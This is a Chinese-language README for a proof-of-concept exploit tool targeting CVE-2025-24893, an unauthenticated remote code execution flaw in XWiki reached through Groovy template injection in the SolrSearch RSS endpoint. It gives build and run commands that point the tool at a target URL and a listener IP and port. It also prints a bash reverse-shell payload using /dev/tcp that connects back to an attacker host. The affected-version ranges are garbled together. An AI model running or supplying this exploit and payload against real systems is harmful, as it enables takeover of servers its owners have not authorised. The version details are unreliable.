
针对CVE-2025-24893的概念验证漏洞利用工具,该漏洞是XWiki中一个未经认证的远程代码执行(RCE)漏洞。通过Groovy脚本执行,利用SolrSearch端点中的模板注入缺陷。
针对 CVE-2025-24893 的概念验证漏洞利用程序,该漏洞是 XWiki 中的一个严重未授权 远程代码执行 漏洞。
此漏洞利用程序滥用了 SolrSearch 端点中的 Groovy 模板注入,无需认证即可执行任意命令(包括反弹 Shell)。
XWiki 处理发送给 SolrSearch RSS 端点的精心构造的输入时存在一个缺陷,允许攻击者将 Groovy 代码注入到渲染管道中。
这使得攻击者可以通过 {{groovy}} 脚本块实现 未授权远程代码执行。
< 15.10.11>= 16.0.0 and < 16.4.115.10.1116.4.1下载发布版本:
或从源码构建:
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444
有一个预构建的反弹 Shell 载荷,格式如下:
bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1
此代码仅用于教育和授权的安全研究。
请勿将此漏洞利用程序用于您未拥有或未经明确许可测试的系统。
/bin/get/Main/SolrSearch?media=rss 的可疑访问